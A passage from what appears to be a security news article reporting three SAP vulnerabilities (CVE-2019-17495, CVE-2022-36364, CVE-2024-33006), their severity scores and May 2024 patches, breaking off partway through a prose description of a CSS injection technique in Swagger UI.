Three vulnerabilities associated with CSS injection, file upload, and remote code execution have been discovered in the SAP Customer Experience (CX) commerce cloud and SAP Netweaver Application.
These two vulnerabilities have been assigned with CVE-2019-17495 and CVE-2022-36364.
The severity of these vulnerabilities is CVE-2019-17495 – 9.8 (Critical) and CVE-2022-36364 8.8 (High), respectively.
CVE-2019-17495 exists in the Swagger UI library, and CVE-2022-36364 exists in the Apache Calcite Avatica library used in SAP Commerce Cloud.
Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers
However, the File upload vulnerability CVE-2024-33006 exists in the SAP Netweaver application server ABAP and ABAP (Advanced Business Application Programming) platform.
The severity for this vulnerability has been given as 9.8 (Critical).
All of these vulnerabilities have been patched as part of the HotNews update for May 2024 by SAP.
Vulnerability Analysis
CVE-2019-17495: Cascading Style Sheets (CSS) Injection Vulnerability In Swagger UI
This vulnerability which exists in the Swagger UI can be exploited by a threat actor which allows the use of the Relative Path Overwrite (RPO) technique.
This, in turn, allows them to perform CSS-based input field value exfiltration like the exfiltration of a CSRF token value.
To explain further, Swagger UI intentionally allows the embedding of untrusted JSON data from remote servers.
Nevertheless, it was not known previously that